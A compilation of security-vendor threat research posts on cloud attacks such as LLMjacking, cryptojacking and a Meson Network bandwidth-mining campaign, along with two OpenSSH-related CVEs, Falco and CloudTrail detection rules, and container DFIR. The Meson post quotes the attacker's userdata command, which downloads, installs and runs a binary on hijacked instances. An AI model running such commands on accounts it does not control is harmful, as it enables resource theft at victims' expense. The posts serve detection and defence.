Sysdig | Stefano Chierici

Sysdig Threat Research Team – Black Hat 2024

Stefano Chierici — Mon, 22 Jul 2024 14:00:00 +0000

The Sysdig Threat Research Team (TRT) is on a mission to help secure innovation at cloud speeds.

A group of some of the industry’s most elite threat researchers, the Sysdig TRT discovers and educates on the latest cloud-native security threats, vulnerabilities, and attack patterns.

We are fiercely passionate about security and committed to the cause. Stay up to date here on the latest insights, trends to monitor, and crucial best practices for securing your cloud-native environments.

Below, we will detail the latest research and how we have improved the security ecosystem.

And if you want to chat with us further, look us up at the Sysdig booth at Black Hat 2024!

LLMJACKING

The Sysdig Threat Research Team (TRT) recently observed a new attack known as LLMjacking. This attack leverages stolen cloud credentials to target ten cloud-hosted large language model (LLM) services.

Once initial access was obtained, the attackers exfiltrated cloud credentials and gained access to the cloud environment, where they attempted to access local LLM models hosted by cloud providers. In this instance, a local Claude (v2/v3) LLM model from Anthropic was targeted. If undiscovered, this type of attack could result in over $46,000 of LLM consumption costs per day for the victim.

Sysdig researchers discovered evidence of a reverse proxy for LLMs being used to provide access to the compromised accounts, suggesting a financial motivation. However, another possible motivation is to extract LLM training data.

All major cloud providers, including Azure Machine Learning, GCP’s Vertex AI, and AWS Bedrock, now host large language model (LLM) services. These platforms provide developers with easy access to various popular models used in LLM-based AI.

The attackers are looking to gain access to a large number of LLM models across different services. No legitimate LLM queries were actually run during the verification phase. Instead, just enough was done to figure out what the credentials were capable of and what quotas applied. In addition, logging settings are queried where possible. This is done to avoid detection when using the compromised credentials to run their prompts.

The ability to quickly detect and respond to those threats is crucial for maintaining strong defense systems. Essential tools like Falco, Sysdig Secure, and CloudWatch Alerts help monitor runtime activity and analyze cloud logs to identify suspicious behaviors. Comprehensive logging, including verbose logging, provides deep visibility into the cloud environment’s activities. This detailed information allows organizations to gain a nuanced understanding of critical actions, such as model invocations, within their cloud infrastructure.
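As a rough illustration of the kind of log analysis described above, the following sketch counts model invocations per identity from already-parsed CloudTrail records and flags identities above a threshold. The field names (`eventSource`, `eventName`, `userIdentity.arn`) follow CloudTrail's usual record layout, but the sample records, the threshold, and the function names are assumptions made for this example and are not Sysdig's detection logic.

```python
from collections import Counter

# Bedrock API calls that run a prompt. Treat this set as an assumption to tune.
INVOCATION_EVENTS = {"InvokeModel", "InvokeModelWithResponseStream"}


def count_model_invocations(records):
    """Count Bedrock model invocations per caller ARN."""
    counts = Counter()
    for record in records:
        if record.get("eventSource") != "bedrock.amazonaws.com":
            continue
        if record.get("eventName") not in INVOCATION_EVENTS:
            continue
        arn = (record.get("userIdentity") or {}).get("arn", "unknown")
        counts[arn] += 1
    return counts


def flag_heavy_callers(records, threshold):
    """Return caller ARNs whose invocation count exceeds the threshold."""
    counts = count_model_invocations(records)
    return sorted(arn for arn, total in counts.items() if total > threshold)


# Hypothetical sample records, for illustration only.
sample = [
    {"eventSource": "bedrock.amazonaws.com", "eventName": "InvokeModel",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:user/app"}},
] + [
    {"eventSource": "bedrock.amazonaws.com", "eventName": "InvokeModel",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:user/leaked"}}
    for _ in range(5)
]

print(flag_heavy_callers(sample, threshold=3))
```

In practice the threshold would come from a per-identity baseline rather than a fixed number, since legitimate workloads can also invoke models heavily.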

SSH-SNAKE

SSH-Snake is a self-modifying worm that leverages SSH credentials discovered on a compromised system to start spreading itself throughout the network. The worm automatically searches through known credential locations and shell history files to determine its next move. SSH-Snake is actively being used by threat actors in offensive operations.

Sysdig TRT uncovered the command and control (C2) server of threat actors deploying SSH-Snake. This server holds a repository of files containing the output of SSH-Snake for each of the targets they have gained access to.

Filenames found on the C2 server contain IP addresses of victims, which allowed us to make a high-confidence assessment that these threat actors are actively exploiting known Confluence vulnerabilities in order to gain initial access and deploy SSH-Snake. This does not preclude other exploits from being used, but many of the victims are running Confluence.

The output of SSH-Snake contains the credentials found, the targets’ IPs, and the victims’ bash history. The victim list is growing, which means that this is an ongoing operation. At the time of writing, the number of victims is approximately 300.

The Rebirth Botnet

In March 2024, the Sysdig Threat Research Team (TRT) began observing attacks against one of our Hadoop honeypot services from the domain “rebirthltd[.]com.” Upon investigation, we discovered that the domain pertains to a mature and increasingly popular DDoS-as-a-Service botnet: the Rebirth Botnet. The service is based on the Mirai malware family, and the operators advertise its services through Telegram and an online store (rebirthltd.mysellix[.]io).

The threat actors operating the botnet are financially motivated and advertise their service primarily to the video gaming community. Although there is no evidence that this botnet is being purchased for purposes beyond gaming, organizations may still be at risk of being exploited and becoming part of the botnet. We’ve taken a detailed look at how this group operates from a business and technical point of view.

At the core of RebirthLtd’s business is its DDoS botnet, which is rented out to whomever is willing to pay. RebirthLtd offers its services through a variety of packages listed on a web-based storefront that has been registered since August 2022. The cheapest plan, for which a buyer can purchase a subscription and immediately receive access to the botnet’s services, is priced at $15. The basic plan seems to only include access to the botnet’s executables and limited functionalities in terms of the available number of infected clients. More expensive plans include API access, C2 servers availability, and improved features, such as the number of attacks per second that can be launched.

The botnet’s main services target video game streaming platforms for financial gain, as its Telegram channel claims that RebirthHub (another moniker for the botnet, along with RebirthLtd) is capable of “hitting almost all types of game servers.” The Rebirth admin team is quite active on YouTube and TikTok as well, where they showcase the botnet’s capabilities to potential customers. Through our investigation, we detected more than 100 undetected executables of this malware family.

SCARLETEEL

The attack graph we observed for this group is the following:

Compromise AWS accounts by exploiting vulnerable compute services, gaining persistence, and attempting to make money using crypto miners. Had we not thwarted their attack, our conservative estimate is that their mining would have cost over $4,000 per day until stopped.

We know that they are not only after crypto mining, but stealing intellectual property as well. In their recent attack, the actor discovered and exploited a customer mistake in an AWS policy, which allowed them to escalate privileges to AdministratorAccess and gain control over the account, enabling them to do with it what they wanted. We also watched them target Kubernetes in order to scale their attack significantly.

AMBERSQUID

Keeping with the cloud threats, Sysdig TRT has uncovered a novel cloud-native cryptojacking operation which we’ve named AMBERSQUID. This operation leverages AWS services not commonly used by attackers, such as AWS Amplify, AWS Fargate, and Amazon SageMaker. The uncommon nature of these services means that they are often overlooked from a security perspective, and the AMBERSQUID operation can cost victims more than $10,000/day.

The AMBERSQUID operation was able to exploit cloud services without triggering the AWS requirement for approval of more resources, as would be the case if they only spammed EC2 instances. Targeting multiple services also poses additional challenges for incident response, since it requires finding and killing all miners in each exploited service.

We discovered AMBERSQUID by analyzing over 1.7M Linux images to understand what malicious payloads are hiding in the container images on Docker Hub.

This dangerous container image didn’t raise any alarms during static scanning for known indicators or malicious binaries. It was only when the container was run that its cross-service cryptojacking activities became obvious. This is consistent with the findings of our 2023 Cloud Threat Report, in which we noted that 10% of malicious images are missed by static scanning alone.

MESON NETWORK

Sysdig TRT discovered a malicious campaign using the blockchain-based Meson service to reap rewards ahead of the crypto token unlock happening around March 15th 2024. Within minutes, the attacker attempted to create 6,000 Meson Network nodes using a compromised cloud account. The Meson Network is a decentralized content delivery network (CDN) that operates in Web3 by establishing a streamlined bandwidth marketplace through a blockchain protocol.

Within minutes, the attacker was able to spawn almost 6,000 instances inside the compromised account across multiple regions and execute the meson_cdn binary. This comes at a huge cost for the account owner. As a result of the attack, we estimate a cost of more than $2,000 per day for all the Meson network nodes created, even just using micro sizes. This isn’t counting the potential costs for public IP addresses which could run as much as $22,000 a month for 6,000 nodes! Estimating the reward tokens amount and value the attacker could earn is difficult since those Meson tokens haven’t had values set yet in the public market.

In the same way, as in the case of AMBERSQUID, the image looks legitimate and safe from a static point of view, which involves analyzing its layers and vulnerabilities. However, during runtime execution, we monitored outbound network traffic, and we spotted gaganode being executed and performing connections to malicious IPs.

Besides actors and new Threats, CVEs

Hunting for new malicious actors is not the only purpose of the Sysdig TRT. The team also reacts quickly to newly disclosed vulnerabilities and updates the product with new rules to detect them at runtime. The two most recent examples are shown below.

CVE-2024-6387

On July 1st, Qualys’s security team announced CVE-2024-6387, a remotely exploitable vulnerability in the OpenSSH server. This critical vulnerability is nicknamed “regreSSHion” because the root cause is an accidental removal of code that fixed a much earlier vulnerability CVE-2006-5051 back in 2006. The race condition affects the default configuration of sshd (the daemon program for SSH).

OpenSSH versions older than 4.4p1 (unless patched for the earlier CVE-2006-5051 and CVE-2008-4109) and versions from 8.5p1 up to, but not including, 9.8p1 are impacted. The general guidance is to update to a fixed version. Ubuntu users can download the updated packages.
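The version ranges above can be turned into a quick triage check. The sketch below is a minimal example that only compares the upstream major and minor version; the function names are made up for illustration. Because distributions often backport fixes without changing the upstream version string, a positive result is a prompt to check the vendor advisory rather than proof of exposure.

```python
import re


def parse_major_minor(version):
    """Extract (major, minor) from strings such as '8.5p1' or 'OpenSSH_9.6p1'."""
    match = re.search(r"(\d+)\.(\d+)", version)
    if match is None:
        raise ValueError(f"unrecognized OpenSSH version: {version!r}")
    return int(match.group(1)), int(match.group(2))


def in_affected_range(version):
    """True when the upstream version falls in a range listed as impacted."""
    major_minor = parse_major_minor(version)
    if major_minor < (4, 4):
        # Impacted unless patched for CVE-2006-5051 and CVE-2008-4109.
        return True
    # 8.5p1 introduced the regression; 9.8p1 contains the fix.
    return (8, 5) <= major_minor < (9, 8)


for candidate in ("4.3p2", "7.4p1", "8.5p1", "9.7p1", "9.8p1"):
    print(candidate, in_affected_range(candidate))
```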

Exploiting regreSSHion requires many attempts (thousands, in fact) executed within a fixed period of time. This exploit complexity is what lowers the CVE from a “Critical” to a “High” risk vulnerability.

Using Sysdig, we can detect drift from baseline sshd behaviors. In this case, stateful detections would track the number of failed attempts to authenticate with the sshd server. Falco rules alone detect the potential Indicators of Compromise (IoCs). By pulling this into a global state table, Sysdig can better detect the spike of actual, failed authentication attempts for anonymous users, rather than focus on point-in-time alerting.
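To make the idea of stateful detection concrete, here is a minimal sketch of a sliding-window counter for failed authentication attempts per source address. It is not how Sysdig implements its state table; the class name, window size, and limit are assumptions chosen for illustration, and timestamps are assumed to arrive in non-decreasing order.

```python
from collections import defaultdict, deque


class FailedAuthTracker:
    """Track failed sshd authentications per source within a sliding window."""

    def __init__(self, window_seconds, max_failures):
        self.window_seconds = window_seconds
        self.max_failures = max_failures
        self._events = defaultdict(deque)

    def record_failure(self, source_ip, timestamp):
        """Record one failure; return True once the source exceeds the limit."""
        events = self._events[source_ip]
        events.append(timestamp)
        # Drop attempts that have fallen out of the sliding window.
        while events and events[0] <= timestamp - self.window_seconds:
            events.popleft()
        return len(events) > self.max_failures


tracker = FailedAuthTracker(window_seconds=60, max_failures=3)
alerts = [tracker.record_failure("198.51.100.7", t) for t in (0, 10, 20, 30)]
print(alerts)
```

A point-in-time rule would fire on each failure individually; keeping state per source is what lets the spike itself become the signal.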

CVE-2024-3094

On March 29th, 2024, the Openwall mailing list announced a backdoor in a popular package called XZ Utils. This utility includes a library called liblzma, which is used by SSHD, a critical part of the Internet infrastructure used for remote access. When loaded, the backdoored library (CVE-2024-3094) affects the authentication of SSHD, potentially allowing intruders access regardless of the method.

Affected versions: 5.6.0, 5.6.1
Affected Distributions: Fedora 41, Fedora Rawhide

For Sysdig Secure users, this rule is called “Backdoored library loaded into SSHD (CVE-2024-3094)” and can be found in the Sysdig Runtime Threat Detection policy.

- rule: Backdoored library loaded into SSHD (CVE-2024-3094)
  desc: A version of the liblzma library was seen loading which was backdoored by a malicious user in order to bypass SSHD authentication.
  condition: open_read and proc.name=sshd and (fd.name endswith "liblzma.so.5.6.0" or fd.name endswith "liblzma.so.5.6.1")
  output: SSHD Loaded a vulnerable library (| file=%fd.name | proc.pname=%proc.pname gparent=%proc.aname[2] ggparent=%proc.aname[3] gggparent=%proc.aname[4] image=%container.image.repository | proc.cmdline=%proc.cmdline | container.name=%container.name | proc.cwd=%proc.cwd proc.pcmdline=%proc.pcmdline user.name=%user.name user.loginuid=%user.loginuid user.uid=%user.uid user.loginname=%user.loginname image=%container.image.repository | container.id=%container.id | container_name=%container.name|  proc.cwd=%proc.cwd )
  priority: WARNING
  tags: [host,container]
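The rule's condition is essentially a suffix match on files opened by sshd. The same check can be sketched offline against lines in the style of /proc/<pid>/maps, for example when reviewing a collected process snapshot. The sample lines and the function name below are made up for illustration, and the parsing assumes the path is the last whitespace-separated field.

```python
BACKDOORED_SUFFIXES = ("liblzma.so.5.6.0", "liblzma.so.5.6.1")


def backdoored_libraries(maps_lines):
    """Return mapped paths that end with a backdoored liblzma file name."""
    hits = set()
    for line in maps_lines:
        fields = line.split()
        if not fields:
            continue
        path = fields[-1]  # assumption: the path is the last field
        if path.endswith(BACKDOORED_SUFFIXES):
            hits.add(path)
    return sorted(hits)


# Hypothetical snapshot lines, for illustration only.
sample_maps = [
    "7f1c2a000000-7f1c2a003000 r--p 00000000 08:01 131 /usr/lib64/liblzma.so.5.6.1",
    "7f1c2a100000-7f1c2a120000 r-xp 00000000 08:01 132 /usr/lib64/libcrypto.so.3",
]

print(backdoored_libraries(sample_maps))
```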

Sysdig Secure Solution

Sysdig Secure enables security and engineering teams to identify and eliminate vulnerabilities, threats, and misconfigurations in real-time. Leveraging runtime insights gives organizations an intuitive way to both visualize and analyze threat data.

Sysdig Secure is powered by Falco’s unified detection engine. This cutting‑edge engine leverages real‑time behavioral insights and threat intelligence to continuously monitor the multi‑layered infrastructure, identifying potential security incidents.

Whether it’s anomalous container activities, unauthorized access attempts, supply chain vulnerabilities, identity‑based threats, or simply meeting your compliance requirements, Sysdig ensures that organizations have a unified and proactive defense against these rapidly evolving threats.

MEET SYSDIG TRT AT BLACK HAT 2024

Sysdig Threat Research Team (TRT) members will be onsite at booth #1750 at Black Hat 2024, August 7 – 8 in Las Vegas, to share insights from their findings and analysis of some of the hottest and most important cybersecurity topics this year.

Reserve a time to connect with the Sysdig TRT team at the show!

The post Sysdig Threat Research Team – Black Hat 2024 appeared first on Sysdig.

Cloud Threats Deploying Crypto CDN

Stefano Chierici — Mon, 11 Mar 2024 14:22:26 +0000

The Sysdig Threat Research Team (TRT) discovered a malicious campaign using the blockchain-based Meson service to reap rewards ahead of the crypto token unlock happening around March 15th. Within minutes, the attacker attempted to create 6,000 Meson Network nodes using a compromised cloud account. The Meson Network is a decentralized content delivery network (CDN) that operates in Web3 by establishing a streamlined bandwidth marketplace through a blockchain protocol.

In this article, we cover what happened in the observed attack, further explain what the Meson Network is, and describe how the attacker was able to use it to their advantage.

What Happened

On February 26th, the Sysdig TRT responded to suspicious alerts for multiple AWS users associated with exposed services within our honeynet infrastructure. The attacker exploited CVE-2021-3129 in a Laravel application and a misconfiguration in WordPress to gain initial access to the cloud account. Following initial access, the attacker used automated reconnaissance techniques to quickly get the lay of the land. They then used the privileges they identified for the compromised users to create a large number of EC2 instances.

The EC2 instances were created in the account using RunInstances with the following userdata. The userdata field allows for commands to be run when an EC2 instance starts.

wget 'https://staticassets.meson.network/public/meson_cdn/v3.1.20/meson_cdn-linux-amd64.tar.gz' && tar -zxf meson_cdn-linux-amd64.tar.gz && rm -f meson_cdn-linux-amd64.tar.gz && cd ./meson_cdn-linux-amd64 && sudo ./service install meson_cdn
sudo ./meson_cdn config set --token=**** --https_port=443 --cache.size=30
sudo ./service start meson_cdn

The commands shown above download the meson_cdn binary and run it as a service. This code can be found in the official Meson network documentation.
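During an investigation, user data is a useful place to look for this kind of payload. EC2 returns user data base64-encoded, so a first step is to decode it and search for known strings. The sketch below assumes the encoded value has already been retrieved; the indicator list and function names are illustrative choices, not a complete signature set.

```python
import base64

# Strings taken from the commands shown above. Extend as needed.
INDICATORS = ("meson_cdn", "staticassets.meson.network")


def decode_user_data(encoded):
    """Decode base64 user data into text, tolerating odd bytes."""
    return base64.b64decode(encoded).decode("utf-8", errors="replace")


def find_indicators(encoded, indicators=INDICATORS):
    """Return the indicators present in the decoded user data."""
    script = decode_user_data(encoded)
    return [indicator for indicator in indicators if indicator in script]


# Build a sample value locally instead of using real attacker data.
sample = base64.b64encode(b"sudo ./service start meson_cdn").decode("ascii")
print(find_indicators(sample))
```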

Analysis of the CloudTrail logs showed the attacker came from a single IP address, 13[.]208[.]251[.]175. The compromised account experienced malicious activity across many AWS regions. The attacker used a public AMI (Ubuntu 22.04) and spawned multiple batches of 500 micro-sized instances per region, as reported in the following log. We had a limit set on the account restricting new EC2 creation to micro-sized instances; otherwise, the attacker would almost certainly have preferred larger, more expensive instances.

"eventTime": "2024-02-26T20:33:10Z",
    …
    "userAgent": "Boto3/1.34.49 md/Botocore#1.34.49 ua/2.0 os/linux#6.2.0-1017-aws md/arch#x86_64 lang/python#3.10.12 md/pyimpl#CPython cfg/retry-mode#legacy Botocore/1.34.49 Resource",
    "requestParameters": {
        "instancesSet": {
            "items": [
                {
                    "imageId": "ami-0a2e7efb4257c0907",
                    "minCount": 500,
                    "maxCount": 500
                }

Within minutes, the attacker was able to spawn almost 6,000 instances inside the compromised account across multiple regions and execute the meson_cdn binary. This comes at a huge cost for the account owner. As a result of the attack, we estimate a cost of more than $2,000 per day for all the Meson network nodes created, even just using micro sizes. This isn’t counting the potential costs for public IP addresses which could run as much as $22,000 a month for 6,000 nodes! Estimating the reward tokens amount and value the attacker could earn is difficult since those Meson tokens haven’t had values set yet in the public market.
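The arithmetic behind these figures can be sketched as follows. The public IPv4 rate of $0.005 per address per hour is AWS's published charge as of February 2024, and 730 hours is a common approximation for one month; both should be treated as assumptions to re-check against current pricing. Rather than assuming an instance price, the example derives the hourly rate per instance implied by the $2,000/day estimate.

```python
HOURS_PER_DAY = 24
HOURS_PER_MONTH = 730  # common billing approximation for one month
PUBLIC_IPV4_HOURLY_USD = 0.005  # assumption: AWS public IPv4 charge, Feb 2024


def monthly_public_ip_cost(addresses, hourly_rate=PUBLIC_IPV4_HOURLY_USD):
    """Estimated monthly charge for a number of public IPv4 addresses."""
    return addresses * hourly_rate * HOURS_PER_MONTH


def implied_hourly_rate(daily_cost, instances):
    """Per-instance hourly rate implied by a total daily cost."""
    return daily_cost / (instances * HOURS_PER_DAY)


print(round(monthly_public_ip_cost(6000)))
print(round(implied_hourly_rate(2000, 6000), 4))
```

With 6,000 addresses the public IP charge comes to roughly $21,900 per month, in line with the $22,000 figure, and $2,000 per day across 6,000 instances corresponds to about $0.014 per instance per hour.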

Looking inside one of the instances created, we can see the meson_cdn process started correctly using the default configuration.

cat default.toml
end_point = "https://cdn.meson.network"
https_port = 443
token = "ami-03f4878755434977f"
[cache]
  folder = "./m_cache"
  size = 30
[log]
  level = "INFO"

While monitoring the meson_cdn process’s system calls, it’s possible to find the files exchanged with the CDN. In the system calls we captured, a file is created containing an image.

Checking the files created in the m_cache folder, we can find different content, such as images and messages like:

{"name":"GAS#30","description":"{GAS} - {GOLDAPESQUAD} - RARITIES INCLUDED, LAYERS ON LAYERS, COME TO DISCORD TO SHOW OFF YOUR APE!","image":"https://nftstorage.link/ipfs/bafybeicr3csbrrdo2h3g27ddu3sfppwzdfrufzpwm24qcmzbmy6jjuzydy/72","attributes":[{"trait_type":"APE PICS","value":"Download (82)"},{"trait_type":"BACKPICS","value":"Ai(4)"},{"trait_type":"Rarity Rank","value":363,"display_type":"number"}],"properties":{"files":[{"uri":"https://nftstorage.link/ipfs/bafybeicr3csbrrdo2h3g27ddu3sfppwzdfrufzpwm24qcmzbmy6jjuzydy/72"}]}}

Contrary to what we expected, the Meson application used relatively little memory and CPU compared to traditional cryptojacking incidents. To better understand why, and why we are seeing image storage, let’s dig deeper into what Meson Network actually does.

What is Web3 and the Meson Network

Meson Network is a blockchain project committed to creating an efficient bandwidth marketplace on Web3, using a blockchain protocol model to replace the traditional cloud storage solutions like Google Drive or Amazon S3 which are more expensive and have privacy limitations.

For those who are not familiar with Web3, it is presented as an upgrade to its precursors, Web 1.0 and 2.0. This concept of a new decentralized internet is based on blockchain networks, cryptocurrencies, and NFTs, and claims to prioritize decentralization, redistributing ownership to users and creators for a fairer digital landscape.

To accomplish this goal, Web3 requires some basic conditions:

bandwidth to let the entire network be efficient
storage to achieve decentralization

In this attack, we don’t talk about crypto mining in the traditional terms of memory or CPU cycles usage, but rather bandwidth and storage in return for Meson Network Tokens (MSN). The Meson documentation gives this explanation:

Mining Score = Bandwidth Score * Storage Score * Credit Score

This means miners will receive Meson tokens as a reward for providing servers to the Meson Network platform, and the reward will be calculated based on the amount of bandwidth and storage brought into the network.

Going back to what we observed during the attack, this explains why the attack didn’t result in the usual massive amount of CPU being used but instead a huge number of connections.

New trend, new threats

It is no mystery that Meson Network has been getting some hype in the blockchain world since its Initial Coin Offering (ICO) on Feb 8th, 2024. As we saw, it is the perfect time for mining to inject liquidity and bring interest into a new coin.

The Sysdig TRT recently monitored a spike in images pushed to Docker Hub related to Meson Network and its features, reinforcing the interest in this service. One of the container images on Docker Hub we analyzed, wawaitech/meson, was created around one month ago and runs gaganode, a Meson Network product related to decentralized edge cloud computing.

The image looks legitimate and safe from a static point of view, which involves analyzing its layers and vulnerabilities. However, during runtime execution, we monitored outbound network traffic and we spotted gaganode being executed and performing connections to malicious IPs.

Same old cryptomining attack?

Yes and no. Attackers still want to use your resources for their goal and that hasn’t changed at all. What is different is the resources requested. For Meson, the attacker is more interested in storage space and high bandwidth instead of high performance CPUs. This can be achieved with a large number of small instances but with a good amount of storage.

Thanks to the ease of scalability in the cloud, spawning a large number of resources is trivial and can be done very quickly across multiple regions. Attackers can have their own CDNs ready in minutes and for free (to them)!

Detection

Knowing how this differs from the miners we are used to seeing, you may wonder whether the usual detection is still effective.

While usual miners are detectable by looking for spikes in CPU usage, as we saw, this won’t be the case here. However, we can still monitor other resources, like instance storage space and connections. A spike in traffic and storage usage would be a red flag you should look into carefully.
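One simple way to express "a spike" is to compare the latest sample against a baseline built from recent history. The sketch below flags a value that exceeds the historical mean by a configurable number of standard deviations. The metric, the sample values, and the three-sigma default are assumptions for illustration; real monitoring systems usually offer more robust anomaly detection.

```python
from statistics import mean, stdev


def is_spike(history, latest, sigmas=3.0):
    """True when latest exceeds the baseline by more than `sigmas` deviations."""
    if len(history) < 2:
        return False  # not enough data to build a baseline
    baseline = mean(history)
    spread = stdev(history)
    if spread == 0:
        return latest > baseline
    return latest > baseline + sigmas * spread


# Hypothetical outbound traffic samples in MB per minute.
outbound_mb = [100, 110, 95, 105, 102]
print(is_spike(outbound_mb, 108))
print(is_spike(outbound_mb, 900))
```

The same function can be applied to disk usage or connection counts, which are the resources this kind of workload consumes.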

Talking about runtime detection, using Falco we could monitor outbound connections done by the host. The following Falco rules can help in detecting those malicious behaviors.

- rule: Unexpected outbound connection destination
  desc: Detect any outbound connection to a destination outside of an allowed set of ips, networks, or domain names
  condition: >
    consider_all_outbound_conns and outbound
  output: Disallowed outbound connection destination (proc.cmdline=%proc.cmdline connection=%fd.name user.name=%user.name user.loginuid=%user.loginuid proc.pid=%proc.pid proc.cwd=%proc.cwd proc.ppid=%proc.ppid proc.pcmdline=%proc.pcmdline proc.sid=%proc.sid)
  priority: NOTICE
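The rule description refers to an allowed set of IPs and networks. The underlying check can be sketched with Python's standard ipaddress module, for example to post-process exported connection events. The allow list and the function name below are placeholders for illustration and do not reflect Falco's internal implementation.

```python
import ipaddress

# Hypothetical allow list. Replace with the networks your workloads need.
ALLOWED_NETWORKS = ["10.0.0.0/8", "192.0.2.0/24"]


def is_allowed_destination(ip, allowed_networks=ALLOWED_NETWORKS):
    """True when the destination IP falls inside any allowed network."""
    address = ipaddress.ip_address(ip)
    return any(
        address in ipaddress.ip_network(network) for network in allowed_networks
    )


for destination in ("10.1.2.3", "203.0.113.9"):
    print(destination, is_allowed_destination(destination))
```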

Looking at cloud events instead, you could monitor instances created in the cloud. The following rule for CloudTrail can help monitor RunInstances events.

- rule: Run Instances
  desc: Detect launching of a specified number of instances.
  condition: >
    ct.name="RunInstances" and not ct.error exists
  output: A number of instances have been launched on zones %ct.request.availabilityzone with subnet ID %ct.request.subnetid by user %ct.user on region %ct.region (requesting user=%ct.user, requesting IP=%ct.srcip, account ID=%ct.user.accountid, AWS region=%ct.region, arn=%ct.user.arn, availability zone=%ct.request.availabilityzone, subnet id=%ct.request.subnetid, reservation id=%ct.response.reservationid)
  priority: WARNING
  source: awscloudtrail
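Since every successful RunInstances call matches this rule, it can help to additionally rank events by how many instances were requested. The following sketch scans parsed CloudTrail records for unusually large batches. The record shape mirrors the fields in the log excerpt shown earlier (`imageId`, `minCount`) plus CloudTrail's standard `maxCount`, `awsRegion`, and `errorCode` fields; the region value in the sample and the batch limit are assumptions for illustration.

```python
def large_run_instances_batches(records, max_batch=20):
    """Return (region, imageId, count) for successful oversized launches."""
    findings = []
    for record in records:
        if record.get("eventName") != "RunInstances" or "errorCode" in record:
            continue
        params = record.get("requestParameters") or {}
        items = (params.get("instancesSet") or {}).get("items", [])
        for item in items:
            requested = item.get("maxCount", item.get("minCount", 0))
            if requested > max_batch:
                findings.append(
                    (record.get("awsRegion"), item.get("imageId"), requested)
                )
    return findings


# Sample record modeled on the excerpt above; the region is hypothetical.
sample_records = [
    {
        "eventName": "RunInstances",
        "awsRegion": "us-east-1",
        "requestParameters": {
            "instancesSet": {
                "items": [
                    {"imageId": "ami-0a2e7efb4257c0907",
                     "minCount": 500, "maxCount": 500}
                ]
            }
        },
    },
    {"eventName": "DescribeInstances", "awsRegion": "us-east-1",
     "requestParameters": None},
]

print(large_run_instances_batches(sample_records))
```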

Another detection perspective might be monitoring unused AWS regions, where commands are not normally executed. To use the following rule without noise, the list disallowed_aws_regions needs to be customized by adding the unused regions in your account.

- rule: AWS Command Executed on Unused Region
  desc: Detect AWS command execution on unused regions.
  condition: >
    not ct.error exists and ct.region in (disallowed_aws_regions)
  output: An AWS command of source %ct.src and name %ct.name has been executed by an untrusted user %ct.user on an unused region=%ct.region (requesting user=%ct.user, requesting IP=%ct.srcip, account ID=%ct.user.accountid, AWS region=%ct.region)
  priority: CRITICAL
  source: awscloudtrail
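The same condition can be applied retroactively to exported CloudTrail records, which is handy for checking how noisy a candidate region list would be before enabling the rule. This is a minimal sketch; the region list and sample records are hypothetical.

```python
def events_in_unused_regions(records, disallowed_regions):
    """Return successful events that occurred in regions marked as unused."""
    disallowed = set(disallowed_regions)
    return [
        record for record in records
        if "errorCode" not in record and record.get("awsRegion") in disallowed
    ]


# Hypothetical region list and records, for illustration only.
unused_regions = ["ap-northeast-3", "sa-east-1"]
sample_events = [
    {"eventName": "RunInstances", "awsRegion": "ap-northeast-3"},
    {"eventName": "RunInstances", "awsRegion": "us-east-1"},
    {"eventName": "RunInstances", "awsRegion": "sa-east-1",
     "errorCode": "Client.UnauthorizedOperation"},
]

for event in events_in_unused_regions(sample_events, unused_regions):
    print(event["eventName"], event["awsRegion"])
```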

Conclusion

Attackers are continuing to diversify their income streams through new ways of leveraging compromised assets. It isn’t all about mining cryptocurrency anymore. Services like Meson network want to leverage hard drive space and network bandwidth instead of CPU. While Meson may be a legitimate service, this shows that attackers are always on the lookout for new ways to make money.

In order to prevent your resources from getting wrapped up in one of these attacks and having to shell out thousands of dollars for resource consumption, it is critical to keep your software up to date and monitor your environments for suspicious activity.

The post Cloud Threats Deploying Crypto CDN appeared first on Sysdig.

CSI Container: Can you DFIR it?

Stefano Chierici — Tue, 28 Mar 2023 15:00:00 +0000

Do you like detective series? Have you ever thought about them actually taking place in cybersecurity? What do you think of CSI on containers? Are you interested in how to apply Digital Forensics and Incident Response (DFIR) to containers and clusters? If all your answers are YES, you will love this article.

The CloudNative SecurityCon took place in early February 2023, where leading security experts gathered to present their latest research and projects. In this article, we are going to take a closer look at the talk CSI Container: Can you DFIR it?

Like any police investigation, it is necessary to follow a series of steps to find the suspect. In this case:

Preparation
Detection & Analysis
Containment, eradication, and recovery
Reporting

But first of all, what is Digital Forensics and Incident Response?

DFIR = DF + IR

Before deep diving into tools, let’s start with a quick intro to DFIR. As we know, DFIR puts together two areas:

Digital Forensics
Incident Response

Digital Forensics (DF) focuses on collecting and analyzing system data, user activity, and other pieces of digital evidence to determine what happened on a machine and who may be behind the activities recorded. All the activities need to be done following best practices and methodologies to maintain the chain of custody, so that evidence is legitimate and can be used and presented to the court for legal proceedings.

Incident Response (IR) focuses on preparing, detecting, containing, and recovering from a data breach. IR techniques not only cover closing gaps in security coverage, but also how to avoid repeating incidents of the same type in the future. Lessons learned from the investigation can highlight the gaps in security coverage that led to the data breach.

In the early days, these two processes were split since they have different goals. However, processes and methodologies were pretty similar. New tools like EDR or XDR evolved and now give the power to incident responders to start investigating what happened and perform further activities. So, it makes sense to put the two areas under the DFIR hat.

DFIR – NIST IR life cycle

When we talk about DFIR and its steps, we refer to the NIST incident response life cycle steps. In the following schema, we can see the four main steps.

Without going too much into the details of each category of the well-known NIST lifecycle, it is worth remembering that an incident response plan needs to be prepared in advance.

Have a response plan

What is the main takeaway we want to emphasize? Attackers aren’t waiting for you to create and update your incident response plan! Knowing the tools you need to use is fundamental, especially in the container world. Be prepared!

As we know, technical aspects aren’t all we need to care about. There are also processes that need to be set, people from different teams need to be involved and they need to know exactly what to do at that moment.

Even if your incident response plan is set, make sure this is up to date! People can change in the organization, and tools change pretty frequently due to new technologies adopted. As we will see, specific tools are required to perform DFIR activities. It’s really important to stay up to date.

Let’s now focus on technical aspects, tools, and procedures, and how to perform those steps in the container world.

Step 1 – Preparation

Preparation is one of the main aspects of Incident Response methodologies.

A good preparation process allows you not only to prevent incidents by hardening your environments, but also to strengthen incident response capabilities so that the organization is ready to respond to incidents. To this end, you can reinforce communications and facilities, hardware and software, or more generic analysis resources.

In this preparation process, one of the main points is to collect all the data logs useful for a possible investigation to have full visibility on the overall infrastructure, and aggregate all the information in a single point so that it would be possible to search and aggregate data.
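To illustrate why aggregating logs in a single place matters, the sketch below merges events from two tools into one timeline ordered by timestamp. The normalized event shape (`timestamp`, `source`, `message`) and the sample events are assumptions made for this example; a log management platform would normally handle this step.

```python
from datetime import datetime


def build_timeline(*sources):
    """Merge event lists from several tools into one list ordered by time."""
    merged = [event for source in sources for event in source]
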